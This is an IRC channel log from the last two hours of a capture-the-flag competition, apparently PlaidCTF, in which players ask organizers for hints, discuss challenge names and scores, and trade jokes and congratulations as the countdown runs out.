The following irc log was given by Adran- Thx <3
+)Plus, that's the reason the time's gonna get mixed up somewhere in the middle, thx (that's me trying to save logs at the last second)
19:00 #pctf: <+ricky> geobot: banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana
19:00 #pctf: < Guest68736> on web100
19:00 #pctf: < geobot> web100
19:00 #pctf: < Adran> on w
19:00 #pctf: < Hertz> yea works
19:00 #pctf: < Hertz> :D
19:00 #pctf: < sven> i'm about 5' 11"
19:00 #pctf: <+dickoff> world's largest ctf player
19:00 #pctf: < sven> always glad to help!
19:00 #pctf: < geobot> (i'm glad to a team that means like pwn2own/pwnium 0days :p
19:01 #pctf: <+ricky> Only 2 more hours!
19:01 #pctf: <+tylerni7> D:
19:01 #pctf: <+tylerni7> and the top 3 are still in contention!
19:02 #pctf: < AnthraX101> And the last file just opened. Lucky, that :P
19:02 #pctf: < nopple> geobot: ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese
19:02 #pctf: <+ricky> Hahh
19:02 #pctf: <+ricky> Oh wow
19:02 #pctf: <+ricky> Jackshit is out
19:02 #pctf: <+ricky> Go go go
19:02 #pctf: <+ricky> (As if we didn't already have enough challenges0
19:02 #pctf: <+ricky> This will be the last one I believe
19:02 #pctf: <+ricky> Have fnu
19:08 #pctf: < lkwpeter> good question
19:08 #pctf: < lkwpeter> forbidden or allowed ?!
19:09 #pctf: <+tylerni7> it won't work...
19:09 #pctf: <+tylerni7> well
19:09 #pctf: <+tylerni7> you can try
19:10 #pctf: < almac> who can I PM to get a little guidance for kpop?
19:10 #pctf: <+ricky> Aaaany more bronies questions? Someone's got to take the 500 points :-)
19:11 #pctf: < Adran> ricky: what is the answer? =D
19:11 #pctf: <+tylerni7> poop
19:11 #pctf: < Adran> (joking)
19:11 #pctf: <+ricky> The answer is the contents of the key file
19:11 #pctf: < geobot> or the contents of jerkcity
19:11 #pctf: <+tylerni7> geobot: you are the best
19:13 -!- cool_guy [~cool_guy@] has joined #pctf
19:13 #pctf: < wtbw> how long left?
19:14 #pctf: <+cai_> little less than 2 hours
19:14 #pctf: <+ricky> Enough time to hack the Bigson!
19:15 #pctf: <+tylerni7> :P
19:15 #pctf: < johnCool> Well, I've got enough of this :) Thanks you guys it was a great ctf.
19:15 #pctf: <+ricky> Thanks for playing!
19:15 #pctf: < wtbw> ty
19:16 #pctf: < NK_> just to be sure
19:16 #pctf: < halfvollemelk> web100.. i'm logged in as admin, but no admin interface?
19:16 #pctf: < geobot> i am going for bronies 2 logged in physical sports?
19:16 #pctf: < NK_> is the tor service still up ?
19:16 #pctf: <+tylerni7> NK_: :|
19:16 #pctf: <+tylerni7> I will check
19:16 #pctf: <+tylerni7> but...
19:16 #pctf: <+tylerni7> it has been up the entire game
19:16 #pctf: <+houqp_> ninjafish: yes
19:16 #pctf: < NK_> okay :)
19:16 #pctf: <+tylerni7> and like 100 people have asked
19:17 #pctf: <+houqp_> NK_: yes
19:17 #pctf: < NK_> oh
19:17 #pctf: <+ricky> halfvollemelk: There should be a message that tells you what to do next when you login as admin
19:18 #pctf: < NK_> tor is too damn slow
19:18 #pctf: < Zoro> molasses
19:18 #pctf: <+houqp_> NK_: yeah, you need to do somethign about it
19:18 #pctf: < NK_> okay
19:19 #pctf: < foundation> i have a new feature request for radare2
19:19 #pctf: < NK_> i see
19:19 #pctf: < foundation> fing C++ template debugging support!!!
19:19 #pctf: < Guest68736> hahahaha the video on web100
19:19 #pctf: < Guest68736> xD
19:20 #pctf: < ciliated> any hints on kpop?
19:20 #pctf: < geobot> darn, we should use pm for kpop?
19:22 #pctf: < Zoro> What are the CHANCE tiles for?
19:22 #pctf: <+tylerni7> Zoro: read the rules
19:23 #pctf: <@cai_> apparently i missed one :p
19:23 #pctf: <+tylerni7> :O
19:23 #pctf: < jagger_> 2.5h? and not 1.5?
19:23 #pctf: <+cai_> 1.5
19:23 #pctf: <+cai_> i only updated the cash bonus. i'll update topic again
19:24 -!- mode/#pctf [+o cai_] by ChanServ
19:28 #pctf: <+mserrano> Hi Brooklynt Overflow
19:28 #pctf: <+mserrano> We are glad you had a burger for lunch and it was good
19:28 #pctf: <+dickoff> Brooklynt_Overfl: Where'd you get your burger
19:28 #pctf: <+ricky> We had Indian food for lunch
19:28 #pctf: <+ricky> It was better than your burger
19:28 #pctf: <+tylerni7> ricky: did you get it from the place on craig?
19:28 #pctf: <+ricky> Yup
19:28 #pctf: <+tylerni7> how was it?
19:28 #pctf: <+ricky> Big fan of that place
19:28 #pctf: <+tylerni7> I've never been there
19:28 #pctf: <+tylerni7> not tamarind, righ?
19:28 #pctf: <+ricky> Oh you've got to try it
19:28 #pctf: <+tylerni7> right*
19:29 #pctf: <+ricky> No, Kohli's
19:29 #pctf: <+tylerni7> huh
19:29 #pctf: < zoku> I have ezhp working locally, but not on your server?
19:29 #pctf: <+mserrano> tylerni7: tamarind is super good but way more expensive
19:29 #pctf: <+mserrano> zoku: are you assuming aslr is off
19:29 #pctf: < zoku> yes
19:29 #pctf: <+tylerni7> I went to the old one before they shut down, and it was /ok/
19:29 #pctf: <+mserrano> because that assumption is wrong
19:29 #pctf: < zoku> er, sorry mserrano, no
19:29 #pctf: <+tylerni7> hadn't been to the new one
19:29 #pctf: < zoku> mserrano: it runs on my server with aslr on
19:29 #pctf: < zoku> $ cat /proc/sys/kernel/randomize_va_space
19:29 #pctf: < zoku> 2
19:29 #pctf: <+mserrano> zoku: on some systems aslr does not randomize the relevant thing
19:29 #pctf: <+mserrano> on our system it does
19:29 #pctf: <+mserrano> v0v
19:29 #pctf: < zoku> god damnit
19:29 #pctf: <+tylerni7> oh boy, dragon sector got zfs
19:30 #pctf: <+tylerni7> :O
19:30 #pctf: <+ricky> Uh oh
19:30 #pctf: <+mserrano> The binary running on the server is the same as the one we gave you
19:30 #pctf: <+tylerni7> WHO WILL WIN
19:30 #pctf: <+ricky> Getting cloes again
19:30 #pctf: <+tylerni7> this is so exciting
19:30 #pctf: <+mserrano> and it has been confirmed to work
19:30 #pctf: <+mserrano> MUCH EXCITE
19:30 #pctf: <+mserrano> SUCH WOW
19:30 #pctf: <+ricky> I think whoever hacks the Bigson will win
19:30 #pctf: <+mserrano> VERY FLAGE
19:30 #pctf: < geobot> teh flage is not poop
19:30 #pctf: <+mserrano> MANY CTF
19:30 #pctf: <+ricky> So you should all drop everything and go hack the Bigson
19:30 #pctf: <+frozencemetery> worship the old norse gods!
19:30 #pctf: <+tylerni7> geobot: that's not even true!
19:30 #pctf: < geobot> not even tried to determine who gets to you might be stuck on some inconsistencies in windows but works
19:30 #pctf: <+dickoff> geobot: don't leak flags in channel please
19:30 #pctf: < clockish> geobot: you lie!
19:30 #pctf: <+ricky> geobot: banana
19:31 #pctf: <+mserrano> geobot: banana
19:31 #pctf: <+houqp_> geobot: banana
19:31 #pctf: < clockish> geobot: banana banana banana banana banana banana
19:31 #pctf: <+cai_> geobot: banana
19:31 #pctf: <+dickoff> I like bananas
19:31 #pctf: < wtbw> O_o
19:31 #pctf: <+frozencemetery> geobot: bananananananabatman
19:31 #pctf: < clockish> banana banana banana banana banana banana
19:31 #pctf: <+houqp_> geobot: poopnana
19:31 #pctf: <+dickoff> he's too clever for us
19:32 #pctf: < KT> lol :)
19:32 -!- copyleft_ [~copyleft@] has joined #pctf
19:33 #pctf: <+ricky> You can hack the Bigson from a mobile device - isn't web awesome?
19:33 -!- sweet_potatoes [~sweet_pot@] has joined #pctf
19:33 #pctf: < Thordenm> ricky: but can you do it with punchcards?
19:34 #pctf: < sweet_potatoes> any hint for web200 (javascript one) :/ ?
19:34 #pctf: < oceanx> banananaaaaa
19:34 #pctf: < sweet_potatoes> lolz
19:34 #pctf: < sweet_potatoes> oceanx: sexy ?
19:34 #pctf: < sigsegv_> any hints on stego?
19:34 #pctf: < geobot> i'm done according to organizers told us hints
19:34 #pctf: <+tylerni7> sigsegv_: the flag is INSIDE THE COMPUTER
19:34 #pctf: < inter> tylerni7: NO THE FLAG IS IN YOUR MIND
19:35 #pctf: < inter> SO YOU TELL; ME
19:35 #pctf: < Zerith> where do I enter a key for Misc ? :\
19:35 #pctf: < geobot> just enter the r_netsec folks
19:35 #pctf: < Zerith> oops
19:35 #pctf: < Zerith> ignore dat
19:35 #pctf: <+mserrano> Zerith: same place you enter any key
19:35 #pctf: <+mserrano> lol
19:35 #pctf: <+frozencemetery> i,i bend over and I'll show you
19:35 #pctf: < inter> you shouldve
19:35 #pctf: < inter> named the multiplication question "multiplication is gay"
19:36 #pctf: <+frozencemetery> yeah that's not happening inter.
19:36 #pctf: < _blasty_> ok
19:36 #pctf: < Pitr_> wrong. gay multiplication is an oxymoron amongst almost all species.
19:36 #pctf: < `Peluche> For chall graphs (crypto 200), when we got the message, do we have to do someting next with the message or the message is the flag ?
19:37 #pctf: <+mserrano> `Peluche: the message is the flag
19:37 #pctf: < geobot> geobot can always know who own the message someone about 5 hours
19:37 #pctf: <+mserrano> but you can decode the number into text
19:39 #pctf: < `Peluche> mserrano: ok. thanks, so I guess I don't have the good number ^^
19:39 #pctf: < HeartLESS_> who is not busy? Have a question about web100
19:39 #pctf: < geobot> re200 runned correctly but not the video on web100 please?
19:40 #pctf: < HeartLESS_> ricky, I`ve wrote you pm
19:40 #pctf: < inter> tylerni7 is watching ponies, so hes not busy HeartLESS_
19:40 #pctf: < HeartLESS_> written*
19:40 #pctf: <+cai_> HeartLESS_: you can pm me
19:43 -!- Gut_ [uid24602@gateway/web/irccloud.com/x-lpojyjxhyocewncw] has joined #pctf
19:44 #pctf: < zoku> I've been working on ezhp all weekend and it works on all my systemmss, I just wanna scoree!
19:44 -!- bs` [~bs@gateway/tor-sasl/bs/x-48276796] has joined #pctf
19:44 #pctf: <+ricky> zoku: So you have a shell on one of our systems right
19:44 #pctf: <+ricky> Via the sass problem
19:44 #pctf: <+ricky> See if you can make it work on our system
19:45 #pctf: < sven> asking for a friend: what if i root that system to grab the flag? :-P
19:45 #pctf: < geobot> grats stratum auhuur for the web100 flag?
19:46 #pctf: <+tylerni7> sven: hmm ricky what do you think?
19:46 #pctf: <+tylerni7> sven: I'm not sure how much it'll help :P
19:46 #pctf: < geobot> it'll be done this year
19:46 #pctf: < _blasty_> DO WE BURN 0DAY YES NO ?
19:47 #pctf: <+mserrano> _blasty_: you... definitely do not have to
19:47 #pctf: < iago-x86> blackops: obviously
19:47 #pctf: < iago-x86> DOL IT
19:47 #pctf: < iago-x86> DO IT
19:47 #pctf: <+mserrano> _blasty_: you should solve bronies2 though
19:47 #pctf: <+mserrano> you can do it
19:47 #pctf: <+mserrano> I believe in you
19:47 #pctf: <+cai_> _blasty_: you could, and include that in your writeup
19:47 #pctf: <+tylerni7> xD
19:47 #pctf: <+mserrano> pls include full 0day in writeup
19:47 #pctf: <+dickoff> _blasty_: is it worth 4k? :)
19:47 #pctf: <+mserrano> 8k*
19:47 #pctf: < clockish> _blasty_: will trade 0-days 4 flags
19:47 #pctf: <+mserrano> or I guess 4k, yeah
19:47 #pctf: <+tylerni7> mserrano: well 1st vs 2nd
19:49 #pctf: <+cai_> man, it's gonna be a huge pain to do a write-up for the ctf.. lol 30 something problems
19:49 #pctf: <+cai_> good luck..
19:49 #pctf: <+ricky> Hehe
19:49 #pctf: <+ricky> Didn't think of that :-)
19:49 #pctf: <+ricky> I see that the bigson is crashing
19:49 #pctf: <+ricky> This is a great sign :-)
19:50 #pctf: < sven> who would make that poor thing crash? :-(
19:50 #pctf: < spq> ricky: can we ask something about web800?
19:50 #pctf: <+ricky> spq: Sure thing
19:50 #pctf: <+mserrano> spq: ask away, you may not get a good answer :P
19:51 #pctf: < iago-x86> Luckily, I only solved a few. Easy to make writeup! :)
19:51 #pctf: <+tylerni7> iago-x86: writeup is just for cash prizes :)
19:51 #pctf: <+ricky> Shhh don't tell him that!
19:51 #pctf: < marcoscars02> xD
19:51 #pctf: <+mserrano> although we would be happy if you wrote writeups anyway :P
19:52 #pctf: < marcoscars02> tylerni7, or to fill a blog
19:52 #pctf: < marcoscars02> XD
19:52 #pctf: <+tylerni7> otherwise we'll kill you
19:52 #pctf: < clockish> yeah, everyone should do writeups!
19:52 #pctf: < clockish> democratize hacking!
19:52 #pctf: <+tylerni7> clockish: keep hacking elite!
19:52 #pctf: <+mserrano> unless you're tomcr00se in which case no writeups
19:52 #pctf: <+mserrano> in order to keep hacking elite
19:52 #pctf: <+frozencemetery> s/democratize/demoralize/ <-- for the way I read it first
19:52 #pctf: < clockish> tylerni7: up with the proletariat
19:52 #pctf: < poppopret> why does tomcr00se not write writeups?
19:52 #pctf: < inter> cuz he has swag
19:52 #pctf: <+tylerni7> poppopret: he wants to keep hacking elite
19:52 #pctf: <+mserrano> efn
19:52 #pctf: <+tylerni7> poppopret: also he's kind of a dick
19:52 #pctf: <+mserrano> efb*
19:53 #pctf: <+tylerni7> tomcr00se: <3
19:53 #pctf: <+mserrano> 70min to go
19:53 #pctf: <+mserrano> 67*
19:53 -!- mode/#pctf [-o cai_] by ChanServ
19:53 #pctf: <+mserrano> go go go 0xffa/ds/mslc/etc
19:54 #pctf: < clockish> tylerni7: note that we're not exactly great about writeups, either...
19:54 #pctf: <+ricky> Hey when we're required to, we write them
19:54 #pctf: <+cai_> we will turn off the scoreboard for the last hour
19:54 #pctf: <+cai_> j/k
19:55 #pctf: <+ricky> Half the room was about to turn around and yell at cai_
19:55 #pctf: < tokki> lol
19:55 #pctf: <+ricky> (The room we're sitting in)
19:55 #pctf: <+mserrano> naw we shoulda turned it off like 8 hours before the end
19:55 #pctf: < tokki> lool
19:55 #pctf: <+mserrano> codegate style
19:56 #pctf: < [CISSP]HoLyVieR> for the polygon challenge, was there anything posted about the dictionnary we have to brute-force with ? Or just any dictionnary should do ?
19:56 #pctf: < sven> pf, it's way more exciting this way :)
19:56 #pctf: <+mserrano> [CISSP]HoLyVieR: wat
19:56 #pctf: <+ricky> So PPP doesn't do stupid password brute forcing challenges
19:56 #pctf: <+ricky> Unless it's a crypto thing where the brute force is reasonable
19:56 #pctf: < clockish> and local
19:56 #pctf: <+ricky> Please note this for the future :-)
19:56 #pctf: < tokki> lol
19:57 #pctf: < [CISSP]HoLyVieR> "They claim bots can no longer attack the website protected by the Polygon Shifter. Do we need to manually bruteforce the credentials?"
19:57 #pctf: < [CISSP]HoLyVieR> that's in the description
19:57 #pctf: <+mserrano> [CISSP]HoLyVieR: if the question ever mentions manual bruteforcng
19:57 #pctf: <+ricky> OK, that's kind of just part of the whole making fun of shapesecurity
19:57 #pctf: <+mserrano> the answer is not manual bruteforcing
19:57 #pctf: <+mserrano> when's the last time you manually bruteforced something
19:57 #pctf: <+mserrano> and enjoyed it
19:57 #pctf: <+ricky> Like it's supposed to be sarcastic
19:57 #pctf: < [CISSP]HoLyVieR> I'm not manually brute-forcing it
19:57 #pctf: < oceanx> lol
19:57 #pctf: <+mserrano> bruteforce is not the answer
19:58 #pctf: < sven> it's a start, though
19:58 #pctf: <+mserrano> not a good one
19:58 #pctf: < sven> never claimed that :)
19:58 #pctf: < foundation> say no to manual bruteforcee!
19:58 #pctf: < tokki> i just had 30mins of manual bruteforcing lol
19:58 #pctf: < Adran> tokki: did that work?
19:58 #pctf: < sven> use automated bruteforce instead. more fun for everyone!
19:58 #pctf: < positron_> how to solve kpop without file write
19:59 #pctf: < tokki> :D YES
19:59 #pctf: < Adran> tokki: *.*
19:59 #pctf: < tokki> positron_: listen to kpops..?
19:59 #pctf: < Adran> ugh
19:59 #pctf: < tokki> *.*
19:59 #pctf: < opxx> how much time left?
19:59 #pctf: < tokki> 1HR
19:59 #pctf: < tokki> 111111
19:59 #pctf: < opxx> damn
20:00 #pctf: < tokki> ikr
20:00 #pctf: < opxx> stil no idwa about that js-web... this one + web800 are the hardest one
20:00 #pctf: < opxx> *idea
20:00 #pctf: < tokki> GOOD LUCK GUYS FOR THE LAST HOUR
20:00 #pctf: <+ricky> web800 is quality enterprise web
20:00 #pctf: < sven> for some value of quality
20:01 #pctf: < opxx> what do u mean by that?
20:01 #pctf: < sven> nothing.
20:01 #pctf: <+ricky> I think 0xffa is about to solve part
20:01 #pctf: <+ricky> 2
20:01 #pctf: < ius> ricky: its not written in java is it
20:01 #pctf: <+ricky> Super super close :-)
20:02 #pctf: < Adran> ricky: i'm presuming you're monitoring the stuff? :P
20:02 #pctf: <+ricky> :-)
20:02 #pctf: <+cai_> Adran: he is :)
20:02 #pctf: < Adran> fun
20:02 #pctf: <+ricky> Anyway, I suspect it's gg after you get that
20:02 #pctf: < tokki> ftw!
20:03 #pctf: <+ricky> Nicely done
20:03 #pctf: <+tylerni7> nicely *almost* done
20:03 #pctf: <+tylerni7> :P
20:03 #pctf: <+ricky> I'm sure it's coming any second now
20:03 #pctf: <+tylerni7> that's what she said
20:03 #pctf: < mathiasbynens> :D
20:03 #pctf: <+mserrano> :D
20:03 #pctf: <+ricky> :-(
20:04 #pctf: < tokki> :D lol
20:06 #pctf: < inter> dude
20:06 #pctf: < inter> i
20:06 #pctf: < inter> i cant
20:06 #pctf: < inter> handle the ponies anymore
20:06 #pctf: < qll> xD
20:06 #pctf: <+ricky> Heheh
20:09 #pctf: < batzig_> for crypto 200 (graphs) does the decrypted number need to be converted to a string to be submitted?
20:09 #pctf: < tokki> my friend's saying he is getting high on ponies
20:09 #pctf: <+tylerni7> batzig_: yes
20:09 #pctf: < WuZ> I have a question for "rendez-vous", which admin can I pm?
20:09 #pctf: < opxx> any hint for halphow2js will be released?
20:10 #pctf: <+mserrano> 50min
20:10 #pctf: < iZsh> i'm about to have a heartattack
20:10 #pctf: < tokki> they're gonna release hints like
20:10 #pctf: * sven too
20:10 #pctf: < tokki> in the last 30 seconds
20:10 #pctf: < opxx> ^^
20:10 #pctf: <+mserrano> lol
20:10 #pctf: * sven can't take the suspense anymore :<
20:10 #pctf: <+mserrano> iZsh / sven: don't die
20:10 #pctf: <+tylerni7> at least not until you solve bronies
20:11 #pctf: < tokki> brownies!
20:12 -!- Beched [6daa088b@gateway/web/freenode/ip.] has joined #pctf
20:12 #pctf: < poppopret> is the polygon challenge supposed to be easy?
20:12 #pctf: <+tylerni7> fairly easy
20:12 #pctf: <+tylerni7> still 100 points though
20:13 #pctf: < deject3d_> for web100, we can assume the password length is what the page says right
20:13 #pctf: < dwn> I want to know how long hudak took mslc/dragon/etc.
20:13 #pctf: < dwn> because apparently I am really bad
20:13 #pctf: < Pitr_> Can someone explain the last step I'm missing in curlcore, in 1 hour? :)
20:13 #pctf: < poppopret> it's giving me an aneurysm
20:13 #pctf: < dwn> yea.
20:13 #pctf: < dwn> i mean it's fun
20:13 #pctf: < tokki> hudak means fast(?) in korean
20:13 #pctf: <+tylerni7> Pitr_: you can pm me... but I may not be able to help
20:13 #pctf: < dwn> but i am gonna take forever
20:14 #pctf: < factoreal> who solve web_200 reekee?
20:14 #pctf: <+tylerni7> factoreal: you can pm me specific questions about it
20:14 #pctf: < Hero2Morow> is parlor down?
20:14 #pctf: <+tylerni7> Hero2Morow: will check
20:14 #pctf: <+tylerni7> Hero2Morow: no
20:15 #pctf: < NK_> tylerni7: are you guys coming to phdays this year ?
20:15 #pctf: <+tylerni7> NK_: I think a few of us are...
20:16 #pctf: < positron_> gimme hints for kpop
20:16 #pctf: < Hero2Morow> cookie
20:16 #pctf: < Hero2Morow> jk i have no clue
20:16 #pctf: < Hero2Morow> jk i have no clue:(
20:16 #pctf: < Hero2Morow> ive bene trying to tolve it for 2 days :(
20:16 #pctf: < sven> hints are for the weak
20:17 #pctf: < tokki> lol if in any quals someone comes up and asks you for an autograph
20:17 #pctf: < tokki> that'll be me
20:17 #pctf: <+mserrano> < 45 minutes
20:17 #pctf: < sven> fuckfuckfuck
20:17 #pctf: < tokki> *gasp*
20:17 #pctf: <+houqp_> gogogogogo
20:17 #pctf: < architekt> gogoogo
20:17 #pctf: <+houqp_> geobot: gogogogogo
20:17 #pctf: < tokki> gogogogog
20:18 #pctf: <+tylerni7> dragon sector! you still have time!
20:18 #pctf: < Hero2Morow> gooooooooooooooooooo
20:18 #pctf: < tokki> EVERYONE FTW
20:18 #pctf: < inter> what if i told you the real winner is tylerni7
20:18 #pctf: <+tylerni7> you would be wrong
20:18 #pctf: < halfvollemelk> gogogogogo GUYS!
20:18 #pctf: < inter> he spread the bronies around
20:18 #pctf: < inter> infecting normal people
20:19 #pctf: <+ricky> So cloes so close :-)
20:19 #pctf: < Hero2Morow> DRAGON SECTOR JUST GOT POINTS
20:19 #pctf: < Hero2Morow> DAYYYUUUU,
20:19 #pctf: < Hero2Morow> M
20:19 #pctf: < tokki> DAYUMMMMMN
20:19 #pctf: < acez> anyone here for 'jackshit' challenge ?
20:19 #pctf: < Pitr_> thanks tylerni7, I've got one more thing to try
20:19 #pctf: <+ricky> Uh oh
20:19 #pctf: <+tylerni7> ok
20:19 #pctf: <+mserrano> Hero2Morow: u wot m8
20:19 #pctf: < acez> tylerni7: 'jackshit' challenge admin around ?
20:19 #pctf: <+mserrano> acez: ping clockish
20:19 #pctf: < acez> thanks
20:19 #pctf: < clockish> yeah me
20:20 #pctf: < tokki> fuck my itunes just came on
20:20 #pctf: < tokki> and scared the shit out of me
20:21 #pctf: <+mserrano> < 40
20:21 #pctf: < halfvollemelk> gotta go, great CTF! thanks guys
20:22 #pctf: < Hero2Morow> you could fuck with people so hard
20:22 #pctf: <+mserrano> everybody
20:22 #pctf: <+tylerni7> halfvollemelk: thanks for playing!
20:22 #pctf: <+mserrano> ricky's favorite pony
20:22 #pctf: <+mserrano> is Princess Celestia
20:22 #pctf: < Hero2Morow> by solving a good amount fo the problems
20:22 #pctf: < tokki> ooh
20:22 #pctf: < Hero2Morow> but saving the flags for the last 20 minuteds
20:22 #pctf: <+tylerni7> Hero2Morow: yeahh...
20:22 #pctf: < Hero2Morow> and just jump to the top
20:22 #pctf: <+tylerni7> that's called "being a dick"
20:22 #pctf: < acez> btw the ctf ends in 40 minutes ?
20:22 #pctf: <+tylerni7> acez: 38
20:22 #pctf: <+tylerni7> but yeah
20:22 #pctf: <+tylerni7> (as in, on time)
20:22 #pctf: < acez> k thanks
20:23 #pctf: < Sin__> what did you guys do since the start to make the website more responsive ?
20:23 #pctf: < geobot> hadn't been responsive
20:23 #pctf: < tomcr00se> i think i'm too tired for jackshit
20:23 #pctf: <+tylerni7> Sin__: awesie has a writeup about the site
20:23 #pctf: < Sin__> okay, cool
20:23 #pctf: <+tylerni7> it'll get posted after the ctf
20:24 #pctf: < tomcr00se> all looks like best quality code to me
20:24 #pctf: <+mserrano> tomcr00se: jackshit may be broken
20:24 #pctf: <+ricky> tomcr00se: I think 0xffa solved bronies 2 in about 2 hours or less - you can do it in 30 min, right?
20:24 #pctf: <+mserrano> we are checking
20:24 #pctf: < acez> thanks
20:24 #pctf: <+ricky> Solved meaning got super super cloes
20:24 #pctf: <+tylerni7> mserrano: it's /probably not/ broken
20:24 #pctf: <+tylerni7> but it might be
20:25 #pctf: < tomcr00se> mserrano: OMG THATS JACKSHIT
20:25 #pctf: <+ricky> Hahaha
20:25 #pctf: < tomcr00se> i work so hard
20:25 #pctf: < tomcr00se> think i deserve hint for _nightmare_
20:25 #pctf: <+ricky> Oh maybe more like 3 hours, not sure
20:25 #pctf: < ciliated> where the flag is in reekee
20:25 #pctf: <+ricky> Anyway :-)
20:25 #pctf: <+ricky> The flag is reekee is in a file somewhere I believe
20:25 #pctf: < tokki> tomcr00se: they're gonna give the hint 30 seconds before the ctf ends
20:26 #pctf: < oceanx> tomcr00se: everyone deserves a hint for _nightmare_ :P
20:26 #pctf: < geobot> skier_ did you get a hint for _nightmare_
20:26 #pctf: < vladum_> quick question about reekee, please?
20:26 #pctf: <+ricky> vladum_: pm tylerni7
20:26 #pctf: < ciliated> +ricky: at which directory?
20:27 #pctf: <+ricky> ciliated: Not sure what directory, you don't need to know to solve it
20:27 -!- erketu [~erketu@] has joined #pctf
20:27 #pctf: < sdjakl> geobot: ffa hasn't gotten any hints
20:27 #pctf: < geobot> he kinda surprised it hasn't really appreciate your sentiment
20:27 #pctf: * tokki looks at clock looks at clock looks at clock throws clock
20:28 #pctf: < poppopret> is web150 considered easy or hard?
20:28 #pctf: < geobot> what 8 ctfs offer the most realistic data fetch and not a brony, fwiw, i think some of you sobs do you ball so hard?
20:29 #pctf: < comex> geobot: i'm a brony
20:29 #pctf: <+tylerni7> geobot: did you like the site?
20:29 #pctf: <+tylerni7> er
20:29 #pctf: <+tylerni7> comex: *
20:29 #pctf: <+ricky> Did you know all the captchas from memor?
20:29 #pctf: < comex> tylerni7: i was asleep for the actual brony part though :(
20:29 #pctf: <+tylerni7> aww
20:29 #pctf: <+tylerni7> that makes me sad
20:30 #pctf: * ricky whistles
20:30 #pctf: <+tylerni7> comex: yeah, top notch web skillz
20:30 #pctf: < geobot> all 8 users around but nothing that i put into how teams are your skillz at cracking sql dump seem to work with: ctf though -_-
20:30 #pctf: < ryan-c> yay, got parlor
20:31 #pctf: < sdjakl> tylerni7: I swear, the things you made me go through for reekee
20:31 #pctf: < clockish> jackshit updated to remove the stack protector
20:31 #pctf: < sdjakl> tylerni7: (speaking of web skills)
20:31 #pctf: <+dickoff> ANNOUNCE: ---------------- jackshit updated to remove the stack protector --------------------------------
20:31 #pctf: < Beched> huh
20:32 #pctf: < Beched> btw rather nice ctf, i thought it will be worse
20:32 #pctf: < iZsh> meh
20:32 #pctf: < Beched> i mean ppp never makes bad tasks
20:32 #pctf: < zoku> ricky: could you installs trace on the nightmare box?
20:32 #pctf: < ius> ricky: reporting in for knowing some PONIES by heart by now
20:32 #pctf: <+tylerni7> sdjakl: :)
20:32 #pctf: <+tylerni7> Beched: haha
20:32 #pctf: < Beched> but they make only PWN
20:32 #pctf: < iZsh> why do you guys change the binary 30min before the end?
20:32 #pctf: < Beched> and now there're various categories
20:32 #pctf: <+tylerni7> iZsh: because we fucked it up
20:32 #pctf: < zoku> ricky: trying to debug my ezhp exploit
20:32 #pctf: <+ricky> Congrats 0xfaa for solving Bronies 2!
20:32 #pctf: < Beched> but lol even in web there's pwn xD
20:32 #pctf: < geobot> we should make only pwn a setuid binary so ida
20:32 #pctf: <+cai_> Grats :)
20:32 #pctf: <+ricky> Nicely done!
20:32 #pctf: < iZsh> yeah but we worked with that :s
20:32 #pctf: < _blasty_> b0w d0wn
20:32 #pctf: < _blasty_> BOW DOWN
20:32 #pctf: <+mserrano> 0xffa: gg :D
20:32 #pctf: <+ricky> Good game
20:32 #pctf: < tokki> I L PolygonShifter
20:32 #pctf: <+mserrano> (for that problem anyway)
20:32 #pctf: < tokki> <3
20:32 #pctf: <+ricky> Sorry for that horrible C++
20:33 #pctf: <+tylerni7> dragon sector! better finish up bronies!
20:33 #pctf: <+tylerni7> :O
20:33 #pctf: < hellman_> gg
20:33 #pctf: < iZsh> meh, i was working on jackshit :s
20:33 #pctf: < wtbw> chronosphere due to discharge after the game is over
20:33 #pctf: <+tylerni7> iZsh: it's basically the same
20:33 #pctf: <+mserrano> iZsh: the problem is the same, just no stack protector
20:33 #pctf: < Beched> иец
20:33 #pctf: < Beched> btw
20:33 #pctf: < ryan-c> who the hell is 0xffa?
20:33 #pctf: < Beched> who are 0xffa ? O_O
20:33 #pctf: < Beched> lol
20:33 #pctf: < tokki> ㅣㅐㅣ
20:34 #pctf: < tokki> lol
20:34 #pctf: < ryan-c> lol
20:34 #pctf: <+tylerni7> heh
20:34 #pctf: < zoku> ricky: any other suggestions?
20:34 #pctf: < ius> do the maths
20:34 #pctf: < ius> it'll check out
20:34 #pctf: <+frozencemetery> have you ever really looked at your hands?
20:34 #pctf: < zoku> ricky: I'm having a hell of a time debugging over a connectback shell with no tools
20:34 #pctf: < ryan-c> tylerni7: parlor was fun, thanks :D
20:34 #pctf: <+tylerni7> :P
20:34 #pctf: <+tylerni7> ryan-c: glad you enjoyed it :)
20:34 #pctf: <+tylerni7> ius: but.. addition is hard
20:34 #pctf: <+tylerni7> much like multiplication
20:34 #pctf: < foundation> no eindbazen this year? i guess they must have forgotten their password ?
20:34 #pctf: < tokki> lol
20:34 #pctf: <+mserrano> no way
20:35 #pctf: < sdjakl> 0xffa = x+y for x,y (in) Z
20:35 #pctf: < Beched> heh
20:35 #pctf: <+mserrano> we email it to them in plaintext
20:35 #pctf: < tokki> lol
20:35 #pctf: < Beched> yeah btw, Eindbazen have gone
20:35 #pctf: < Beched> hm
20:35 #pctf: < ius> x + y = 0xffa, solve for x,y indeed ;)
20:36 #pctf: <+ricky> zoku: I think clockish is installing it now
20:36 #pctf: < ryan-c> tylerni7: is the ctf ending on time, or being extended an hour or two?
20:36 #pctf: < clockish> yeah, I'll do it
20:36 #pctf: <+tylerni7> ryan-c: ending on time
20:36 #pctf: <+dickoff> ryan-c: it is ending in 25 minutes
20:36 #pctf: <+tylerni7> as we have been saying :P
20:36 #pctf: <+tylerni7> it's a 48 hour competition
20:36 #pctf: <+tylerni7> you've all had plenty of time :)
20:36 #pctf: < clockish> zoku: anything else you want?
20:36 #pctf: < wtbw> frozencemetery: woah, I have *fingers*
20:36 #pctf: < Beched> ius
20:36 #pctf: < Beched> i remember you're from eindbazen, aren't you?
20:36 #pctf: < Beched> 0xffa == Eindbazen ??? O__O
20:37 #pctf: <+tylerni7> + ...
20:37 #pctf: <+mserrano> O__O
20:37 #pctf: < tokki> O__O
20:37 #pctf: <+tylerni7> 0xffa > 0xeb
20:37 #pctf: < mathiasbynens> mind = blown
20:37 #pctf: < sdjakl> yeah tylerni7 seems to have gotten it
20:37 #pctf: <+frozencemetery> wtbw: weeeeeiiiiiiirdddd
20:37 #pctf: < dkohlbre> | (•□•) |
